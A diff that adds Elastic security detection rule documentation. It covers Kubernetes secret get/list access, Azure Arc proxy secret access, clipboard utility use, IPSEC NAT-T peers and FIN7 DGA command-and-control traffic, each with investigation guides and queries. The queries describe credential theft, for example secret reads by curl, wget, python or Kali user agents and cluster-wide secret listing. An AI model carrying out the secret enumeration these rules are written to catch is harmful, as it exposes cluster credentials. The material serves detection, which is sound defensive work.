b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc new file mode 100644 index 0000000000..70671a6e2b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-with-suspicious-user-agent]] +=== Kubernetes Secret Get or List with Suspicious User Agent + +Detects read access to Kubernetes Secrets (get/list) with a user agent matching a curated set of non-standard or attacker-leaning clients, for example minimal HTTP tooling, common scripting stacks, default library fingerprints, or distribution-tagged strings associated with offensive-security Linux images. Legitimate in-cluster automation usually presents stable, purpose-specific user agents (for example controller or client-go variants used by known components). + +*Rule type*: query + +*Rule indices*: + +* logs-kubernetes.audit_logs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1552/007/ +* https://kubernetes.io/docs/concepts/configuration/secret/ + +*Tags*: + +* Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs +* Domain: Kubernetes +* Platform: Kubernetes +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Secret Get or List with Suspicious User Agent* + + +The rule matches Kubernetes audit events for **secret** `get`/`list` where **`user_agent.original`** matches a **small +allowlist of suspicious patterns** (scripting runtimes, bare HTTP clients, and known offensive-distro markers) and +**`source.ip` is populated**. It is meant to highlight **credential access** where the client fingerprint does not look +like routine kubectl or well-known controller traffic relative to your environment. + + +*Possible investigation steps* + + +- Tie `user.name` (and `kubernetes.audit.impersonatedUser.*` if present) to a human, service account, or cloud identity + and validate whether that principal should use this user-agent profile against the targeted namespaces and secret names. +- Review `kubernetes.audit.objectRef.namespace` and `kubernetes.audit.objectRef.name` for high-value objects (service + account tokens, cloud IAM bindings, registry pulls, TLS bundles). +- Pivot on `source.ip` in VPC flow, VPN, or proxy logs to determine origin (employee laptop, compromised host, cloud + instance) and correlate with other API bursts or exec activity. +- Check `kubernetes.audit.annotations.authorization_k8s_io/decision` for successful reads versus failed probing. + + +*False positive analysis* + + +- CI, GitOps, or one-off scripts can emit generic user agents with broad RBAC; exclude stable pipelines and service + accounts after review. +- Local API server loopback may still populate `source.ip` in some topologies; compare with expected control-plane paths. + + +*Response and remediation* + + +- If unauthorized, rotate affected secrets and credentials, revoke tokens or kubeconfigs for the identity, tighten RBAC, + and block or isolate the source host at the network edge to the API server where appropriate. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:"kubernetes.audit_logs" and +event.action:(get or list) and +kubernetes.audit.objectRef.resource:"secrets" and +event.outcome:"success" and +user_agent.original:(curl* or python* or Python* or wget* or Go-http* or perl* or java* or node* or php* or *distrib#kali* or *kali-amd64* or *kali-arm64* or Bun* or axios* or undici*) and +source.ip:* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc new file mode 100644 index 0000000000..e09af0823a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc @@ -0,0 +1,163 @@ +[[prebuilt-rule-8-19-32-kubernetes-secret-or-configmap-access-via-azure-arc-proxy]] +=== Kubernetes Secret or ConfigMap Access via Azure Arc Proxy + +Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa with the actual caller identity in the impersonatedUser field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. This rule uses a 5-day new-terms history window keyed on the impersonated identity and alerts the first time that Azure AD principal performs this activity. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 9m + +*Searches indices from*: now-5d ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect +* https://microsoft.github.io/Threat-Matrix-for-Kubernetes/ +* https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence +* https://cloud.google.com/blog/topics/threat-intelligence/escalating-privileges-azure-kubernetes-services +* https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis + +*Tags*: + +* Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs +* Domain: Kubernetes +* Platform: Kubernetes +* Domain: Cloud +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Secret or ConfigMap Access via Azure Arc Proxy* + + +When Kubernetes operations are performed through Azure Arc Cluster Connect, the K8s audit log shows the Arc AAD proxy +service account as the authenticated user, with the actual Azure AD identity in the `impersonatedUser` field. This +rule detects non-system secret and configmap access — including reads, writes, and deletions — routed through this +proxy path. Read operations (`get`, `list`) are particularly important to detect as they represent the most common +adversary action: exfiltrating secrets without leaving obvious modification traces. + +This rule uses a new terms approach keyed on `kubernetes.audit.impersonatedUser.username`, so it fires the first time a +given impersonated identity performs this activity within the 5-day history window. + + +*Possible investigation steps* + + +- Check the `kubernetes.audit.impersonatedUser.username` field — this contains the Azure AD object ID of the actual + caller. Cross-reference with Azure AD to identify the service principal or user. +- Review the `kubernetes.audit.impersonatedUser.extra.oid` field for the Azure AD object ID. +- Examine the namespace — operations in `default` or application namespaces are more suspicious than `azure-arc` or + `kube-system`. +- Check the `kubernetes.audit.objectRef.name` — look for suspicious secret/configmap names that don't match known + application resources. +- Correlate with Azure Activity Logs for the same time window to find the `LISTCLUSTERUSERCREDENTIAL` operation that + initiated the Arc proxy session. +- Review Azure Sign-In Logs for the impersonated identity's authentication source IP and geolocation. + + +*Response and remediation* + + +- If the impersonated identity is not recognized, revoke its Azure AD credentials immediately. +- Remove the ClusterRoleBinding or RoleBinding that grants the identity access to secrets/configmaps. +- Rotate any Kubernetes secrets that may have been read or exfiltrated. +- Review the Arc connection and consider disconnecting it if compromised. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index +| WHERE STARTS_WITH(kubernetes.audit.user.username, "system:serviceaccount:azure-arc:") + AND kubernetes.audit.objectRef.resource IN ("secrets", "configmaps") + AND kubernetes.audit.verb IN ("get", "list", "create", "update", "patch", "delete") + AND kubernetes.audit.objectRef.namespace NOT IN ("azure-arc", "azure-arc-release", "kube-system") + AND NOT STARTS_WITH(kubernetes.audit.objectRef.name, "sh.helm.release.v1") + +| STATS + Esql.verb_values = VALUES(kubernetes.audit.verb), + Esql.resource_type_values = VALUES(kubernetes.audit.objectRef.resource), + Esql.resource_name_values = VALUES(kubernetes.audit.objectRef.name), + Esql.namespace_values = VALUES(kubernetes.audit.objectRef.namespace), + Esql.data_stream_namespace_values = VALUES(data_stream.namespace), + Esql.acting_user_values = VALUES(kubernetes.audit.user.username), + Esql.user_agent_values = VALUES(kubernetes.audit.userAgent), + Esql.source_ips_values = VALUES(kubernetes.audit.sourceIPs), + Esql.response_code_values = VALUES(kubernetes.audit.responseStatus.code), + Esql.timestamp_first_seen = MIN(@timestamp), + Esql.timestamp_last_seen = MAX(@timestamp), + Esql.event_count = COUNT(*) + BY kubernetes.audit.impersonatedUser.username + +| WHERE Esql.timestamp_first_seen >= NOW() - 9 minutes +| KEEP kubernetes.audit.impersonatedUser.username, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Information Repositories +** ID: T1213 +** Reference URL: https://attack.mitre.org/techniques/T1213/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Manipulation +** ID: T1565 +** Reference URL: https://attack.mitre.org/techniques/T1565/ +* Sub-technique: +** Name: Stored Data Manipulation +** ID: T1565.001 +** Reference URL: https://attack.mitre.org/techniques/T1565/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc new file mode 100644 index 0000000000..ff77a3317f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc @@ -0,0 +1,109 @@ +[[prebuilt-rule-8-19-32-kubernetes-secrets-list-across-cluster-or-sensitive-namespaces]] +=== Kubernetes Secrets List Across Cluster or Sensitive Namespaces + +Detects list operations on Kubernetes Secrets from a non-loopback client when the request URI targets cluster-wide secrets or list operations under kube-system or default. Useful for spotting broad secret enumeration from remote clients. + +*Rule type*: query + +*Rule indices*: + +* logs-kubernetes.audit_logs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1552/007/ + +*Tags*: + +* Data Source: Kubernetes +* Domain: Kubernetes +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Discovery +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Secrets List Across Cluster or Sensitive Namespaces* + + +Audit events for `list` on the `secrets` resource against `/api/v1/secrets`, paginated cluster lists, or namespace-scoped +lists under `kube-system` or `default`, from a source IP that is not localhost. + + +*Investigation steps* + + +- Confirm the actor (`user.name`, groups) and whether the client is expected (CI, admin bastion, controller). +- Review `kubernetes.audit.requestURI`, `user_agent.original`, and follow-on API activity from the same source. +- Assess exposure: cluster-wide secret listing can surface many credentials. + + +*False positives* + + +- Legitimate controllers or operators listing secrets in `kube-system` / `default` from cluster nodes may match; tune by + source IP, user agent, or service account as needed. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:"kubernetes.audit_logs" and event.action:list and +kubernetes.audit.objectRef.resource:secrets and +kubernetes.audit.requestURI :(/api/v1/secrets or /api/v1/secrets?limit* or /api/v1/namespaces/kube-system/secrets or /api/v1/namespaces/kube-system/secrets?limit* or /api/v1/namespaces/default/secrets or /api/v1/namespaces/default/secrets?limit*) and +source.ip:(* and not ("::1" or "127.0.0.1")) and +not user.name: (system\:kube-controller-manager or eks\:cloud-controller-manager or eks\:kms-storage-migrator or "system:serviceaccount:argocd:argocd-application-controller" or "system:serviceaccount:elastic:kube-state-metrics" or "system:serviceaccount:cert-manager:cert-manager-cainjector" or "system:serviceaccount:elastic-system:elastic-agent" or "system:serviceaccount:longhorn-system:longhorn-service-account") and +not kubernetes.audit.user.groups:("system:serviceaccounts:ibm-csi" or "system:serviceaccounts:argocd" or "system:serviceaccounts:elastic") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Container and Resource Discovery +** ID: T1613 +** Reference URL: https://attack.mitre.org/techniques/T1613/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-linux-clipboard-activity-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-linux-clipboard-activity-detected.asciidoc new file mode 100644 index 0000000000..7d3247993c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-linux-clipboard-activity-detected.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-32-linux-clipboard-activity-detected]] +=== Linux Clipboard Activity Detected + +This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process parent. Adversaries may collect data stored in the clipboard from users copying information within or between applications. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.trellix.com/blogs/research/when-agents-go-rogue-openclaw-supply-chain-crisis/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Collection +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 11 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Linux Clipboard Activity Detected* + + +Clipboard utilities on Linux, such as xclip and xsel, facilitate data transfer between applications by storing copied content temporarily. Adversaries exploit this by capturing sensitive data copied by users. The detection rule identifies unusual clipboard activity by monitoring processes that start these utilities, excluding common parent processes, to flag potential misuse. This helps in identifying unauthorized data collection attempts. + + +*Possible investigation steps* + + +- Review the alert details to identify the specific process name that triggered the alert, focusing on clipboard utilities like xclip, xsel, wl-clipboard, clipman, or copyq. +- Examine the parent process of the detected clipboard utility to understand the context of its execution, ensuring it is not a common parent process like bwrap or micro. +- Investigate the user account associated with the process to determine if the activity aligns with their typical behavior or if it appears suspicious. +- Check the timing and frequency of the clipboard utility's execution to assess if it coincides with any known user activities or if it suggests automated or unauthorized access. +- Analyze any related process events or logs around the time of the alert to identify potential data exfiltration attempts or other malicious activities. +- Consider correlating this alert with other security events or alerts to identify patterns or broader attack campaigns targeting clipboard data. + + +*False positive analysis* + + +- Frequent use of clipboard utilities by legitimate applications or scripts can trigger false positives. Identify and document these applications to create exceptions in the detection rule. +- Developers and system administrators often use clipboard utilities in automated scripts. Review and whitelist these scripts to prevent unnecessary alerts. +- Some desktop environments or window managers may use clipboard utilities as part of their normal operation. Monitor and exclude these processes if they are verified as non-threatening. +- Regular user activities involving clipboard utilities for productivity tasks can be mistaken for suspicious behavior. Educate users on safe practices and adjust the rule to exclude known benign parent processes. +- Consider the context of the clipboard utility usage, such as time of day or user role, to refine detection criteria and reduce false positives. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent potential data exfiltration or further unauthorized access. +- Terminate any suspicious processes identified as running clipboard utilities without a common parent process, such as xclip or xsel, to stop potential data capture. +- Conduct a thorough review of recent clipboard activity logs to identify any sensitive data that may have been captured and assess the potential impact. +- Change passwords and rotate any credentials that may have been copied to the clipboard recently to mitigate the risk of credential theft. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected. +- Implement additional monitoring on the affected system to detect any further unauthorized clipboard activity or related suspicious behavior. +- Review and update endpoint security configurations to ensure that only authorized processes can access clipboard utilities, reducing the risk of future exploitation. + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:"linux" and event.type:"start" and +event.action:("exec" or "exec_event" or "executed" or "process_started" or "start") and +process.name:("xclip" or "xsel" or "wl-clipboard" or "clipman" or "copyq" or "pbcopy" or "wl-copy") and +not process.parent.name:("bwrap" or "micro") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Clipboard Data +** ID: T1115 +** Reference URL: https://attack.mitre.org/techniques/T1115/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-newly-observed-ipsec-nat-traversal-peer.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-newly-observed-ipsec-nat-traversal-peer.asciidoc new file mode 100644 index 0000000000..ecc2ddb18d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-newly-observed-ipsec-nat-traversal-peer.asciidoc @@ -0,0 +1,156 @@ +[[prebuilt-rule-8-19-32-newly-observed-ipsec-nat-traversal-peer]] +=== Newly Observed IPSEC NAT Traversal Peer + +This rule identifies outbound IPSEC NAT Traversal (NAT-T) traffic to an external destination IP that was not observed during the previous 5 days. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal encapsulates IPSEC ESP traffic in UDP and, once a NAT device is detected, both peers float to UDP port 4500 for the tunnel data channel. Newly observed external NAT-T peers may indicate unauthorized VPN use or an adversary tunneling command and control or exfiltration traffic over the Internet. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-7205m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Tactic: Command and Control +* Domain: Endpoint +* Use Case: Threat Detection +* Data Source: PAN-OS +* Data Source: Network Traffic +* Data Source: pfSense +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Newly Observed IPSEC NAT Traversal Peer* + + +IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by encapsulating IPSEC packets in UDP, typically using port 4500. While essential for legitimate encrypted traffic, adversaries exploit this to mask malicious activities and bypass network defenses. This rule surfaces an external destination the first time NAT-T traffic to it is observed within a 5-day history window. + + +*Possible investigation steps* + + +- Review the source and destination IP addresses associated with the UDP traffic on port 4500 to determine if they are known or expected within your network environment. +- Analyze the volume and frequency of the detected traffic to assess whether it aligns with typical IPSEC NAT Traversal usage or if it appears anomalous. +- Check for any associated network traffic events in the same timeframe that might indicate a pattern of suspicious activity, such as unusual data transfer volumes or connections to known malicious IP addresses. +- Investigate the endpoint or device generating the traffic to verify if it is authorized to use IPSEC NAT Traversal and if it has any history of security incidents or vulnerabilities. +- Correlate the detected activity with any recent changes in network configurations or security policies that might explain the traffic pattern. +- Consult threat intelligence sources to determine if the destination IP address or domain has been associated with known threat actors or command and control infrastructure. + + +*False positive analysis* + + +- A legitimate VPN gateway will alert when it is first deployed or first observed after more than 5 days of inactivity. +- Legitimate VPN traffic using IPSEC NAT Traversal can trigger alerts. Regularly review and whitelist known IP addresses or subnets associated with authorized VPN connections to reduce false positives. +- Network devices or services that rely on IPSEC for secure communication may generate expected traffic on port 4500. Identify and document these devices, then create exceptions in the detection rule to prevent unnecessary alerts. +- Automated backup or synchronization services that use IPSEC for secure data transfer might be flagged. Monitor these services and exclude their traffic patterns if they are verified as non-threatening. +- Some enterprise applications may use IPSEC NAT Traversal for secure communication. Conduct an inventory of such applications and adjust the rule to exclude their traffic after confirming their legitimacy. +- Regularly update the list of known safe IP addresses and services to ensure that new legitimate sources of IPSEC NAT Traversal traffic are promptly excluded from triggering alerts. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further potential malicious activity and lateral movement. +- Conduct a thorough analysis of the isolated system to identify any signs of compromise, such as unauthorized access or data exfiltration, focusing on logs and network traffic related to UDP port 4500. +- Block all suspicious IP addresses associated with the detected traffic on port 4500 at the network perimeter to prevent further communication with potential threat actors. +- Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to ensure they effectively block unauthorized IPSEC NAT Traversal traffic, particularly on UDP port 4500. +- Restore the affected system from a known good backup if any signs of compromise are confirmed, ensuring that all security patches and updates are applied before reconnecting to the network. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. +- Implement enhanced monitoring and logging for UDP traffic on port 4500 to detect and respond to any future suspicious activity promptly. + +==== Rule query + + +[source, js] +---------------------------------- +FROM packetbeat-*, auditbeat-*, filebeat-*, logs-network_traffic.flow-*, logs-panw.panos*, logs-pfsense.log-*, logs-zeek.connection-* METADATA _id +| WHERE ( + data_stream.dataset IN ("network_traffic.flow", "zeek.connection") + OR MV_CONTAINS(event.category, "network") + OR MV_CONTAINS(event.category, "network_traffic") + ) + AND network.transport == "udp" + AND source.port == 4500 + AND destination.port == 4500 + AND CIDR_MATCH(source.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16") + AND NOT CIDR_MATCH( + destination.ip, + "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", + "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", + "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", + "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", + "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", "198.18.0.0/15", + "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", "FF00::/8" + ) + AND ( + data_stream.dataset IS NULL + OR data_stream.dataset != "panw.panos" + OR event.action IS NULL + OR event.action NOT IN ("flow_dropped", "flow_denied") + ) +| EVAL Esql.dataset = COALESCE(data_stream.dataset, event.dataset) +| STATS + Esql.first_seen = MIN(@timestamp), + Esql.last_seen = MAX(@timestamp), + Esql.event_count = COUNT(*), + Esql.source_ip_count = COUNT_DISTINCT(source.ip), + Esql.source_ip_values = MV_SLICE(VALUES(source.ip), 0, 100), + Esql.event_action_values = VALUES(event.action), + Esql.dataset_values = VALUES(Esql.dataset), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 20) + BY destination.ip +| EVAL Esql.recent = DATE_DIFF("minute", Esql.first_seen, NOW()) +| WHERE Esql.recent >= 0 AND Esql.recent <= 10 +| KEEP destination.ip, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Non-Application Layer Protocol +** ID: T1095 +** Reference URL: https://attack.mitre.org/techniques/T1095/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Technique: +** Name: Encrypted Channel +** ID: T1573 +** Reference URL: https://attack.mitre.org/techniques/T1573/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-possible-fin7-dga-command-and-control-behavior.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-possible-fin7-dga-command-and-control-behavior.asciidoc new file mode 100644 index 0000000000..7864a330fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-possible-fin7-dga-command-and-control-behavior.asciidoc @@ -0,0 +1,92 @@ +[[prebuilt-rule-8-19-32-possible-fin7-dga-command-and-control-behavior]] +=== Possible FIN7 DGA Command and Control Behavior + +This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint +* Rule Type: ESQL +* Data Source: PAN-OS +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +In the event this rule identifies benign domains in your environment, the `destination.domain` exclusion in the rule can be modified to include those domains. Example: `... | where destination.domain not in ("zoom.us", "benign.domain1", "benign.domain2")`. + +==== Rule query + + +[source, js] +---------------------------------- +from packetbeat-*, filebeat-*, logs-network_traffic.*, logs-panw.panos* metadata _id, _version, _index +| where ( + data_stream.dataset in ("network_traffic.tls", "network_traffic.http") or + ( + data_stream.dataset == "panw.panos" and + network.application in ("ssl", "web-browsing") and network.transport == "tcp" + ) or + (event.category in ("network", "network_traffic") and network.protocol in ("tls", "http") and network.transport == "tcp") + ) +| where destination.domain RLIKE "[a-zA-Z]{4,5}\\.(pw|us|club|info|site|top)" +| where destination.domain != "zoom.us" +| keep @timestamp, destination.domain, source.ip, destination.ip, network.protocol, network.transport, data_stream.dataset, _id, _version, _index + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-application-shimming-via-sdbinst.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-application-shimming-via-sdbinst.asciidoc new file mode 100644 index 0000000000..7f39aaa79f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-application-shimming-via-sdbinst.asciidoc @@ -0,0 +1,178 @@ +[[prebuilt-rule-8-19-32-potential-application-shimming-via-sdbinst]] +=== Potential Application Shimming via Sdbinst + +The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.forwarded* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Windows Security Event Logs +* Data Source: Microsoft Defender XDR +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 320 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + 